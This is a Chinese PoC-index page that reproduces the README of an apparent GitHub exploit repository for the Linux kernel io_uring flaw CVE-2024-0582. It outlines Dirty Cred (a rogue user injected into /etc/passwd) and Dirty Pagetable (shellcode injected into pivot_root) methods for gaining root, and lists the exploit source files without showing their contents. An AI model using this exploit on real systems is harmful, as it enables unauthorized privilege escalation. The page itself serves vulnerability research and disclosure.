POC详情: 3f0e43fd91caaf066b2679456913ac7054f20b93

来源
https://github.com/kuzeyardabulut/CVE-2024-0582
关联漏洞
标题: Linux kernel 安全漏洞 (CVE-2024-0582)
描述:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel存在安全漏洞,该漏洞源于存在内存泄漏问题,允许本地用户导致崩溃或提升权限。
描述
A data-only exploit for CVE-2024-0582
介绍
# CVE-2024-0582 Exploit (PoC)

This repository provides a Proof-of-Concept (PoC) exploit for **CVE-2024-0582**, featuring both **Dirty Cred** and **Dirty Pagetable** attack methods to gain root privilege.

## Description

- **Based on Google Project Zero’s PoC:** This exploits stands out from other PoCs on GitHub because it is heavily based on the PoC described in [a Google Project Zero](https://project-zero.issues.chromium.org/issues/42451653) issue. 
 
- **Additional References:** This exploit drew upon insights from the [Exodus Intelligence blog post](https://blog.exodusintel.com/2024/03/27/mind-the-patch-gap-exploiting-an-io_uring-vulnerability-in-ubuntu/) and [ptrYudai's blog post](https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606).
- **Bug Overview:** *CVE-2024-0582* is rooted in a flaw within the `io_uring` subsystem, allowing unintended access to freed memory pages. 

### Current Exploit Method

1. **Dirty Cred**  
   - Uses an `io_uring` **register/unregister** sequence to trigger Page Use-After-Free.  
   - Grants write access to `/etc/passwd`.  
   - Injects a rogue user entry into `/etc/passwd`.

2. **Dirty Page Method**  
    - Uses an `io_uring` **register/unregister** sequence to trigger *Page Use-After-Free*.  
    - Gain write access to Page Table
    - Injects shellcode to `pivot_root` syscall.

## Adjust the Offset Values  
   Before building, ensure that you have configured the correct offset values for each exploit. Refer to the documentation in:
   - [Dirty Cred](dirty_cred/README.md#determining-the-correct-offset-values)
   - [Dirty Pagetable](dirty_page_table/README.md#determining-the-correct-offset-values)
   
   These offsets may vary depending on your kernel version and environment.

## Disclaimer
This repository and all its contents are for educational and research purposes only. Do not use this exploit on systems you do not own or have explicit permission to test. The author(s) assume no liability for any misuse or damage caused by this material.
文件快照

 [4.0K]  /data/pocs/3f0e43fd91caaf066b2679456913ac7054f20b93
├── [4.0K]  dirty_cred
│   ├── [4.0K]  c
│   │   ├── [8.5K]  exploit.c
│   │   └── [1.1K]  Makefile
│   ├── [2.0K]  README.md
│   └── [4.0K]  rust
│       ├── [ 118]  Cargo.toml
│       ├── [1.1K]  Makefile
│       └── [4.0K]  src
│           ├── [5.5K]  main.rs
│           └── [5.9K]  utils.rs
├── [4.0K]  dirty_page_table
│   ├── [4.0K]  c
│   │   ├── [ 10K]  exploit.c
│   │   └── [1.1K]  Makefile
│   └── [5.2K]  README.md
├── [ 273]  KERNEL_COMMIT_INFO
├── [138K]  kernel.conf
├── [1.0K]  LICENSE
├── [2.0K]  README.md
└── [1.2K]  run_qemu.sh

6 directories, 15 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。